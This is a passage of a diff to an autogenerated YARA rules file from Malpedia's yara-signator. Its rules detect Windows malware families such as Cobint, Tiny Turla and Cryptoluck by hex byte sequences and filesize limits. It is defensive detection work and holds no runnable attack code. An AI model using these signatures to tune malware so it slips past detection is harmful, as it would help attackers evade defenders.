8b8c2498400000 } + $sequence_4 = { 762a 56 e8???????? 8d0445fc6c4400 8bc8 } + $sequence_5 = { 89564c 895e44 6a08 b9???????? } + $sequence_6 = { eb14 807a2100 740a 3935???????? 7302 8bd1 } + $sequence_7 = { 3d00010000 752d 837c241c00 7626 } + $sequence_8 = { e9???????? 8d9580f9ffff 52 b801000000 898d84f9ffff 898d88f9ffff 6a02 } + $sequence_9 = { 8bd1 8b09 eb03 8b4908 80792100 74e6 5f } condition: - 7 of them and filesize <4202496 + 7 of them and filesize <638976 } -rule MALPEDIA_Win_Duuzer_Auto : FILE +rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "df8c3768-3cdc-5b0e-a660-661bdb978bfa" + id = "a0867608-6152-525b-bb1e-ffd07d70fa86" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.duuzer_auto.yar#L1-L145" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.multigrain_pos_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "13aac089d76bc4f63a9fe69893726cbd97eb78875b3161a00634aa641d0ec8d3" + logic_hash = "e5b2ff30a169eba30bec1ec0cb7a796ca39923255067b4e9a8563c5dcf8b4ca3" score = 75 quality = 75 tags = "FILE" @@ -173347,39 +176067,34 @@ rule MALPEDIA_Win_Duuzer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f804 7408 83c8ff e9???????? } - $sequence_1 = { 0145f0 1155f4 85c9 7533 } - $sequence_2 = { 57 4154 4155 4881ec88080000 488b05???????? 4833c4 } - $sequence_3 = { 00f4 c640001c c740008a460323 d188470383ee } - $sequence_4 = { 56 57 b830910000 e8???????? } - $sequence_5 = { 56 57 b8a0010100 e8???????? } - $sequence_6 = { 56 57 488dac2410fcffff 4881ecf0040000 } - $sequence_7 = { 01442410 3bfb 75c4 8b4630 } - $sequence_8 = { 57 4154 4883ec20 448be2 } - $sequence_9 = { 57 4154 4155 4156 4883ec30 488b05???????? } - $sequence_10 = { 014dec 83bf8400000000 7708 398780000000 } - $sequence_11 = { 57 4154 4155 4883ec20 33f6 488bd9 } - $sequence_12 = { 014dec 66837dec00 0f8efc010000 0fbf45ec } - $sequence_13 = { 00e0 3541000436 41 0023 } - $sequence_14 = { 010b 014e4c 014e48 014e54 } + $sequence_0 = { c745fc00000000 8b7518 b8cdcccccc 8d0cf504000000 } + $sequence_1 = { 57 e8???????? 83c404 6a00 c746140f000000 } + $sequence_2 = { c645fc01 e8???????? 83c408 83bdb4fdffff08 720e ffb5a0fdffff } + $sequence_3 = { 0f8530020000 68c8000000 50 8d85c4feffff 50 e8???????? 83c40c } + $sequence_4 = { 0fb64c1e01 c1e905 894df4 eb07 c745f400000000 0fb60c1e 8b55f8 } + $sequence_5 = { 8bd0 8d4dd8 c645fc03 e8???????? } + $sequence_6 = { c745e0ffffffff c745e800000000 c745e400000000 c745ec01000000 c745f401000000 } + $sequence_7 = { e8???????? 83c404 56 ffd3 33db 395f10 56 } + $sequence_8 = { 81eca8040000 a1???????? 33c4 898424a4040000 56 57 } + $sequence_9 = { c745f400000000 8b4df0 8b5df8 0fb609 83e101 } condition: - 7 of them and filesize <491520 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Atmosphere_Auto : FILE +rule MALPEDIA_Win_Badnews_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7ba90f14-d41a-58f9-948d-cf574aec7198" + id = "82b67459-b37a-5597-851f-c5e10ae625fd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmosphere_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badnews_auto.yar#L1-L214" license_url = "N/A" - logic_hash = "0264599b5475822be219779f2f93298a08919e3b2fbd551146e8b50c69fa19e9" + logic_hash = "bc13ea27737db6028c742e92e044e676e8322f3710d6ba3506e9723f27d2a819" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -173391,32 +176106,44 @@ rule MALPEDIA_Win_Atmosphere_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83ec14 56 8b7104 85f6 } - $sequence_1 = { 88460e 33c0 894612 894616 89461a 884e1e } - $sequence_2 = { e8???????? 8b4604 85c0 7504 33f6 eb08 } - $sequence_3 = { 8bcf ff5338 5f 5e } - $sequence_4 = { c645fc02 8bcc 8965e8 50 51 e8???????? } - $sequence_5 = { 8bce 8975e8 8806 ff15???????? } - $sequence_6 = { 8bc4 89642410 50 e8???????? } - $sequence_7 = { 8b7c240c 8bf1 57 ff15???????? 8b470c } - $sequence_8 = { 51 83ec10 8bc4 89642410 50 e8???????? } - $sequence_9 = { 8bcc 8965e8 50 51 } + $sequence_0 = { 50 e8???????? 83c404 68???????? 6804010000 ff15???????? } + $sequence_1 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 } + $sequence_2 = { c705????????55736572 c705????????33322e64 66c705????????6c6c c605????????00 } + $sequence_3 = { eb02 33c9 c0e004 02c1 3423 c0c003 } + $sequence_4 = { 8945fc 53 56 57 8d8534ffffff } + $sequence_5 = { 55 8bec 8b450c 3d01020000 } + $sequence_6 = { d1f9 68???????? 03c9 51 } + $sequence_7 = { 68???????? 6a1a 68???????? 57 } + $sequence_8 = { 6a02 68???????? 50 a3???????? } + $sequence_9 = { 8bf0 56 ff15???????? 50 6a40 } + $sequence_10 = { 56 ffd3 85c0 7403 83c608 8a06 } + $sequence_11 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 } + $sequence_12 = { ff15???????? 85c0 7405 83c004 } + $sequence_13 = { 68???????? ff15???????? b8???????? 83c424 8d5002 668b08 } + $sequence_14 = { e8???????? 68???????? 8d45f4 c745f4682f0110 50 e8???????? cc } + $sequence_15 = { 83e61f c1f805 c1e606 c1e910 c0e107 8b1485d0a70110 } + $sequence_16 = { 8d8d54ffffff 8d5101 90 8a01 } + $sequence_17 = { 7414 8bc2 c1f805 83e21f c1e206 031485d0a70110 } + $sequence_18 = { 8b048dd0a70110 4e 807d1300 8955e4 c64418050a } + $sequence_19 = { 58 668986b8000000 668986be010000 c7466848960110 } + $sequence_20 = { 2bc2 8bf0 d1fe 6a55 ff34f5e0470110 ff7508 e8???????? } + $sequence_21 = { 41 84c0 75f9 2bce 741c 804415ec03 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <612352 } -rule MALPEDIA_Win_Starsypound_Auto : FILE +rule MALPEDIA_Win_Dadstache_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "70e37162-3a73-596a-8d7d-42b9d85b78f7" + id = "1b258f10-8f88-5091-9d8a-b7cbb1e4a0e5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.starsypound_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dadstache_auto.yar#L1-L168" license_url = "N/A" - logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f" + logic_hash = "77711feda2c16f34186a4f1ae2717975593af55ed7e01d177132f4e333f94d90" score = 75 quality = 75 tags = "FILE" @@ -173430,34 +176157,40 @@ rule MALPEDIA_Win_Starsypound_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 } - $sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 } - $sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 } - $sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 } - $sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 } - $sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 } - $sequence_6 = { 50 8d4c2424 56 51 52 } - $sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 } - $sequence_8 = { 83c40c 85c0 7e2b eb08 } - $sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f } + $sequence_0 = { 8d442414 50 6a1f ff35???????? } + $sequence_1 = { 8b470c 8bf9 31460c 0f1006 c7450c09000000 0f1145e8 } + $sequence_2 = { 85c0 7550 8b0d???????? 8b35???????? 85c9 7403 } + $sequence_3 = { 53 8d4d08 895d08 51 53 50 53 } + $sequence_4 = { 837c242c10 8d442418 51 0f4344241c } + $sequence_5 = { 8d5201 8842ff 83e901 75f2 8bd3 c1ea04 } + $sequence_6 = { 6aff 6a00 8d442438 c74424340f000000 50 } + $sequence_7 = { 6a1f ff35???????? ff15???????? a1???????? } + $sequence_8 = { 741b 8b45f0 47 83c628 3bf8 } + $sequence_9 = { 7405 8b4718 8901 8b731c 57 } + $sequence_10 = { 42 83c628 8955f0 3b55e4 0f8c66ffffff } + $sequence_11 = { 7325 8b7c240c 4a 03d7 8d4fff } + $sequence_12 = { 8b4485b0 85d2 8b56f8 7405 0d00020000 8d5de4 53 } + $sequence_13 = { e8???????? 85c0 741d 8bce e8???????? 8bce } + $sequence_14 = { c3 8b4e04 8d4604 8945fc 8b06 } + $sequence_15 = { 84c9 740e 3aca 74ef 0fb6c2 0fb6c9 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <580608 } -rule MALPEDIA_Win_Cobint_Auto : FILE +rule MALPEDIA_Win_Shakti_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "817f690c-d59f-5f8a-a3d9-41671b2ba114" + id = "535cf33d-f06d-5859-b025-0ff160716ffb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobint_auto.yar#L1-L246" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shakti_auto.yar#L1-L172" license_url = "N/A" - logic_hash = "138f47bd93e47d27bded8ff6cb142802d64943eb32ae6054eb04266b57a32a5b" + logic_hash = "6f5489cc7281ed05aa1395fcaba968324612a285b4f1d07b39699fdb3c984697" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -173469,46 +176202,38 @@ rule MALPEDIA_Win_Cobint_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c410 5e 5d c3 a1???????? 56 33f6 } - $sequence_1 = { 3931 740d 40 83c110 83f820 } - $sequence_2 = { 57 ff15???????? 8b15???????? 8bc6 8bca } - $sequence_3 = { ff7508 e8???????? 83c40c 0fb6c0 5d c3 ff751c } - $sequence_4 = { 33f6 a1???????? 03c6 3938 } - $sequence_5 = { ffd6 f7d8 c745f404000000 1bc0 } - $sequence_6 = { 6a65 eb31 85db 743a 3bde 7336 53 } - $sequence_7 = { 59 5d c3 ff7508 6a00 ff35???????? } - $sequence_8 = { 90 90 e10b 96 7c90 90 } - $sequence_9 = { 90 90 749b 807ce19a80 7c90 } - $sequence_10 = { 807c909090 90 90 90 90 90 } - $sequence_11 = { 3c2e 7404 3c2c 7506 41 8a0431 2c20 } - $sequence_12 = { ffd6 6a04 8d45c0 c745c001000000 } - $sequence_13 = { 7202 04e0 8bcf 0fb6c0 c1c108 03c7 } - $sequence_14 = { c745c001000000 50 6a41 53 ffd6 baf608f7a4 } - $sequence_15 = { 837d1000 740d 8b5508 0355f0 } - $sequence_16 = { 0355f0 8a45ec 8802 eb0b 8b4d08 034df0 8a55ed } - $sequence_17 = { 83c005 c3 31b7807c30ae 807c909090 90 bdfd807c90 90 } - $sequence_18 = { 3bcf 7ce2 8b4dbc 8d9524feffff e8???????? 8d8524feffff 50 } - $sequence_19 = { 8d3c08 66391e 75e3 8b5df4 } - $sequence_20 = { 749b 807ce19a80 7c90 90 90 90 } - $sequence_21 = { 8bcf 8bf0 e8???????? 8945f8 8d45c4 50 8d45f0 } - $sequence_22 = { 90 90 bffc807c28 1a807c170e81 7cd7 9b } - $sequence_23 = { 8b75f8 85c0 7412 814df080330000 8d45f0 6a04 50 } + $sequence_0 = { 8945ec 8b4dd4 83c102 894dd4 e9???????? 8b55c0 } + $sequence_1 = { 0fb711 81fa4d5a0000 752e 8b45c0 8b483c } + $sequence_2 = { 8b45fc 8b4dd8 0308 894df0 8b55fc } + $sequence_3 = { 0fb7c2 83f801 753d b9ff0f0000 8b55f0 66230a 0fb7c1 } + $sequence_4 = { 8b45c0 03423c 8945f8 6a40 } + $sequence_5 = { 52 6a00 ff55e4 8945d8 8b45f8 8b4854 894de0 } + $sequence_6 = { 8b45e0 8b0c10 034dc0 baff0f0000 8b45f0 } + $sequence_7 = { 8b55f8 0355c0 8955f8 8b45f8 } + $sequence_8 = { 8b742408 85f6 741e 803e00 7512 ff760c e8???????? } + $sequence_9 = { ff34c5b4a24000 53 57 e8???????? 83c40c 85c0 } + $sequence_10 = { 50 ff759c ff15???????? 85c0 740d 837d9000 } + $sequence_11 = { 8bff 55 8bec 8b4508 33c9 3b04cd10a04000 7413 } + $sequence_12 = { ff15???????? 89459c 83f8ff 7507 32c0 e9???????? 57 } + $sequence_13 = { bf04010000 57 8d860e080000 50 6a00 } + $sequence_14 = { 6a08 50 890d???????? ff15???????? } + $sequence_15 = { 837dd400 a1???????? 7423 c700b8000000 a1???????? } condition: - 7 of them and filesize <65536 + 7 of them and filesize <191488 } -rule MALPEDIA_Win_Tiny_Turla_Auto : FILE +rule MALPEDIA_Win_Sword_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03ecfc31-50be-55ad-b8ea-3661b97e212f" + id = "48310a96-8b09-5184-8f0c-c81d31bbe550" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiny_turla_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sword_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "78e001a1d7d03185ba347a5f9852159024940a515be46a1732bb8c9313d9ab24" + logic_hash = "f0b3a1cc57dfaff82b285dd4a0f174f5006c9f22ab9c244578d6f7f68d086b5a" score = 75 quality = 75 tags = "FILE" @@ -173522,32 +176247,32 @@ rule MALPEDIA_Win_Tiny_Turla_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4533ed 8b7d7f 488b742450 8d4f02 } - $sequence_1 = { 0f84f8000000 33d2 488d4da0 448d4268 } - $sequence_2 = { 488b16 8bd8 894567 41b906000200 488d4577 4533c0 } - $sequence_3 = { 48895c2420 ff15???????? 85c0 750e 488bce } - $sequence_4 = { ff15???????? 85c0 7516 4533ed } - $sequence_5 = { 440fb62a 44886d6f 44894d7f 4585c0 7540 } - $sequence_6 = { ff15???????? b005 e9???????? 8b0f 85c9 } - $sequence_7 = { 418d511b ff15???????? 488bcb 85c0 0f849b000000 8b7d50 } - $sequence_8 = { 48c74308ffffffff 488b4b18 4883f9ff 740e ff15???????? } - $sequence_9 = { 4883ec18 c7042400000000 33c0 83f801 7441 8b0424 488b4c2420 } + $sequence_0 = { f7d1 2bf9 8d942484020000 8bf7 8bfa } + $sequence_1 = { ff15???????? 8b8c2434000100 50 8b84243c000100 8d542424 } + $sequence_2 = { 50 8d54241c 51 52 ff15???????? 85c0 0f8488090000 } + $sequence_3 = { 49 885c29ff 807d0022 7520 8d7d01 } + $sequence_4 = { 83c9ff 33c0 8d942488030000 f2ae f7d1 49 } + $sequence_5 = { 77c8 bf???????? 83c9ff 33c0 f2ae f7d1 } + $sequence_6 = { b940000000 33c0 8d7c2419 8894241c010000 f3ab } + $sequence_7 = { 83c9ff 33c0 f2ae f7d1 2bf9 55 } + $sequence_8 = { 8dbc2494060000 83c9ff 33c0 f2ae f7d1 49 } + $sequence_9 = { f7d1 49 83f903 77c8 bf???????? } condition: - 7 of them and filesize <51200 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Turla_Rpc_Auto : FILE +rule MALPEDIA_Win_Grimplant_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d062a0c9-c6c6-5f57-a60f-6c6b55d2f616" + id = "c3eab5e9-e64a-5697-878f-14199bbf7239" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turla_rpc_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grimplant_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "696b632d482c9df6571dae61d7a8f9238e184ca30e0aa7fbb216cfbf4128270e" + logic_hash = "eec64e00f45245d4dee8d091e0d2ebea0088235a6d441087ed38c039f05955af" score = 75 quality = 75 tags = "FILE" @@ -173561,38 +176286,32 @@ rule MALPEDIA_Win_Turla_Rpc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c645bc55 c7854001000030163930 c78544010000343b2025 c6854801000055 c78560010000013c3830 c785640100003a202155 } - $sequence_1 = { c744244806393030 66c744244c2555 c785c000000006302110 c785c400000027273a27 c785c8000000183a3130 c685cc00000055 } - $sequence_2 = { c7456016273034 c745642130133c c7456839300255 c7851001000016273034 c7851401000021300527 c785180100003a363026 } - $sequence_3 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? } - $sequence_4 = { c7850401000030102d36 c785080100003025213c 66c7850c0100003a3b c6850e01000055 c745c007303431 } - $sequence_5 = { 488bd8 ffd3 488d4d70 488bf8 ffd3 } - $sequence_6 = { c6458e55 c744245033273034 66c74424543155 c744243033273030 c644243455 c744244033263030 66c74424443e55 } - $sequence_7 = { c6852e01000055 c745b0193a3431 c745b4193c3727 c745b834272c14 c645bc55 c7854001000030163930 c78544010000343b2025 } - $sequence_8 = { c7851401000021300527 c785180100003a363026 66c7851c0100002602 c6851e01000055 } - $sequence_9 = { c7854cffffff00000000 c78548ffffff00000000 c78554ffffff00000000 c78550ffffff00000000 c745bc53003a00 c745c028004d00 c745c44c003b00 } - $sequence_10 = { 56 ffd3 8987d8000000 8d87dc000000 } - $sequence_11 = { 68???????? ff15???????? 8b4dfc 33c0 5f 5e } - $sequence_12 = { 8bf8 85ff 7514 8d45ac 50 ff15???????? } - $sequence_13 = { 57 ff15???????? 8b85b8fdffff ffb5bcfdffff a3???????? } - $sequence_14 = { 68???????? e8???????? 6a03 68???????? 8d0c45ac880110 8bc1 } - $sequence_15 = { 8d45c8 50 ffd6 8bf8 8d8558ffffff } + $sequence_0 = { e9???????? 3c08 7465 eb15 3c0e 0f8ff5000000 90 } + $sequence_1 = { ffd2 eb3d 488b4c2428 488b91d0000000 488b442438 ffd2 4885c0 } + $sequence_2 = { eb1f 488db8486a0100 488d15ac5c5000 e8???????? 488db8506a0100 e8???????? 440f11b8586a0100 } + $sequence_3 = { ffd2 b914000000 4889c7 4889de 31c0 488d1da6514200 e8???????? } + $sequence_4 = { ffd1 4883f805 0f85f2100000 0f1005???????? 0f11442478 0f1005???????? 0f11842488000000 } + $sequence_5 = { 746c 4c8b4018 49ffc0 4c394020 7d5f 488d05a3ab1d00 0f1f00 } + $sequence_6 = { 90 488d05cbd28b00 e8???????? 488b442470 4c8b442440 4c8b4c2458 e9???????? } + $sequence_7 = { c6401801 440f113c24 48c744241000000000 488b9c2480000000 4889c1 488bbc24a0000000 488bb424a8000000 } + $sequence_8 = { 90 488d0567839000 e8???????? 8b542440 448b8424b0000000 448b4c2444 89d0 } + $sequence_9 = { eb0f 4889c7 488d159ceb1300 e8???????? 488d0588670a00 488b5c2448 b906000000 } condition: - 7 of them and filesize <311296 + 7 of them and filesize <19940352 } -rule MALPEDIA_Win_Misha_Auto : FILE +rule MALPEDIA_Win_Backspace_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3791b368-7721-59e9-a6c9-80386ca3e3f7" + id = "8637042a-e46d-5e46-8b23-93a8dfec3a24" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.misha_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backspace_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "20e70ebbe7343afb7f42cf249a2a9fa16b58c61214c6be715dfea2d371ecbbbb" + logic_hash = "f8be0bb8ce4eb3c98209ea23733b4688fab87fe72dcb307bd40859035b4f4c31" score = 75 quality = 75 tags = "FILE" @@ -173606,32 +176325,32 @@ rule MALPEDIA_Win_Misha_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fbe09 03c1 894510 8b45f8 40 8945f8 8b4510 } - $sequence_1 = { c20400 55 8bec 51 837d0802 7448 837d0804 } - $sequence_2 = { 8945dc 817d140000007e 7607 33c0 e9???????? 8b4524 } - $sequence_3 = { 32c0 5d c3 56 8bf0 eb0a 8bce } - $sequence_4 = { c78510ffffff04040404 c78514ffffff04040404 c78518ffffff04040404 c7851cffffff04040404 c78520ffffff05050505 c78524ffffff05050505 c78528ffffff05050505 } - $sequence_5 = { 85c0 7404 2bf3 8930 b001 } - $sequence_6 = { 8b450c 0590010000 50 e8???????? 83c414 b001 e9???????? } - $sequence_7 = { 8b4dcc 8d440104 8945cc 837d900f 0f829e000000 837d1c00 741d } - $sequence_8 = { 50 e8???????? 8b5508 56 6a1c 59 } - $sequence_9 = { 8b4514 e8???????? 0fb64524 85c0 7456 6a00 68ffffff7f } + $sequence_0 = { 57 40 50 ff15???????? 85c0 0f8fa3000000 } + $sequence_1 = { 3bfb 59 7405 83c705 } + $sequence_2 = { 8d8500feffff 50 e8???????? 83c424 85c0 740b ff750c } + $sequence_3 = { 8b45f8 ff45f8 3d88130000 7f51 ebc9 8a06 } + $sequence_4 = { 885d91 885d92 885d93 885d94 } + $sequence_5 = { ff15???????? f7d8 1bc0 59 83e002 59 48 } + $sequence_6 = { 393d???????? 7552 be00200000 ff75f8 8d85f8dfffff } + $sequence_7 = { 50 e8???????? 56 e8???????? 8bd8 be???????? 83c306 } + $sequence_8 = { 8d85f8dfffff 50 e8???????? 59 8bc3 59 e9???????? } + $sequence_9 = { a3???????? ff75fc ffd6 395dfc } condition: - 7 of them and filesize <710656 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Photofork_Auto : FILE +rule MALPEDIA_Win_Nvisospit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f7484eb7-9c89-5a31-aecd-73c9087aa29d" + id = "824469e0-98f2-5eab-b839-ba6db77c2d16" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photofork_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nvisospit_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "ff7473e2612dfba9efd366e89c657d77862d4c88088d1b5f47bab69cec947ba6" + logic_hash = "385fb86660d71ea6f219554af1885e2ee67e8307dd338d6dbd8b2f326f4be091" score = 75 quality = 75 tags = "FILE" @@ -173645,32 +176364,32 @@ rule MALPEDIA_Win_Photofork_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c9 4c8d85f0010000 ff15???????? 33db } - $sequence_1 = { 4885d2 7431 488b9278010000 4885d2 753a ba01000000 33c9 } - $sequence_2 = { 4d85c9 7535 8d5301 33c9 } - $sequence_3 = { ff15???????? 4863c8 48ffc6 4803f9 493bf7 0f825fffffff } - $sequence_4 = { 4c8b0d???????? 4d85c9 7430 4d8b8910110000 4d85c9 } - $sequence_5 = { 488d55e8 498bcc e8???????? 4c8bbc2498000000 } - $sequence_6 = { 5e 5d c3 498bdf 6690 80bbc001000030 } - $sequence_7 = { 48ffc1 4883f903 72ea 448b4df8 488d0c7e } - $sequence_8 = { 488bd0 488b05???????? 48899040060000 488d4dc0 ffd2 66837dc009 b840000000 } - $sequence_9 = { 8b44246c 0fb6442468 84c0 7520 } + $sequence_0 = { 83f801 0f851e010000 8d710c 81fe???????? 0f8350feffff 895dbc } + $sequence_1 = { a1???????? ffd0 83ec04 0fb785a2f9ffff 0fb7c0 8d959cf9ffff 89542410 } + $sequence_2 = { c70424???????? e8???????? 85db c705????????02000000 0f85d1fdffff } + $sequence_3 = { a1???????? 31c9 c705????????00004000 8b00 85c0 } + $sequence_4 = { 89442404 c70424???????? e8???????? 0fb785a8f9ffff } + $sequence_5 = { 0f8e16010000 85d2 0f8493010000 b9???????? 81f9???????? } + $sequence_6 = { 0fb7c0 8d959cf9ffff 89542410 c744240c00000000 8d958ef9ffff 89542408 } + $sequence_7 = { 83ec0c 8945bc 8b45bc 89442404 } + $sequence_8 = { e8???????? c7442404b0feffff c70424???????? e8???????? c7442404ccffffff c70424???????? } + $sequence_9 = { 8d9dacfbffff 81c307010000 895c2414 8d9dacfbffff 83c306 895c2410 894c240c } condition: - 7 of them and filesize <99328 + 7 of them and filesize <66560 } -rule MALPEDIA_Win_Lowzero_Auto : FILE +rule MALPEDIA_Win_Cryptoluck_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad1f4f71-db5d-51c4-9bc5-e40c45051891" + id = "a59fe2e6-4321-5ca6-b53f-4f7ee8914f9a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowzero_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoluck_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "bfaa131f289b03263fe3207c7e09eedb0c528831bcdb16b693a70fc486a7a935" + logic_hash = "6db6bc0e7d4030ac1b4c7c7367ac728b4b155db8cbff6f59645d89ef531abf3a" score = 75 quality = 75 tags = "FILE" @@ -173684,32 +176403,32 @@ rule MALPEDIA_Win_Lowzero_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb617 47 83fa20 0f83e2000000 42 8d0432 3bc1 } - $sequence_1 = { 57 8b423c 8b55f4 03c6 } - $sequence_2 = { 2bce 894df0 8d9b00000000 8d1c31 ff7734 85c0 } - $sequence_3 = { 7439 03c3 837f1400 7425 } - $sequence_4 = { 47 2bc8 8d4602 03c3 3b450c } - $sequence_5 = { 8b4d0c 3b7dfc 0f8255feffff 2b7508 5f 8bc6 5e } - $sequence_6 = { 8bce 83e21f c1eb05 c1e208 2bca 49 83fb07 } - $sequence_7 = { 83ec30 53 56 8bd9 8955f4 33f6 895dfc } - $sequence_8 = { 46 47 e9???????? 8bda 8bce 83e21f } - $sequence_9 = { e8???????? 5f 5e 5b c70007000000 33c0 8be5 } + $sequence_0 = { 7409 c745d880720010 eb07 c745d878720010 837d1000 7409 c745d475720010 } + $sequence_1 = { 44 15f40010ff 35ec001eff 20d7 59 392d???????? 1288ff35d403 } + $sequence_2 = { 8b85e4fbffff 50 e8???????? 83c408 8985c4fbffff 83bdc4fbffff00 } + $sequence_3 = { 8b4df8 51 ff15???????? 85c0 7431 8b550c } + $sequence_4 = { 85c0 0f84e8000000 c745ec00000000 8d45ec 50 8d4df0 51 } + $sequence_5 = { 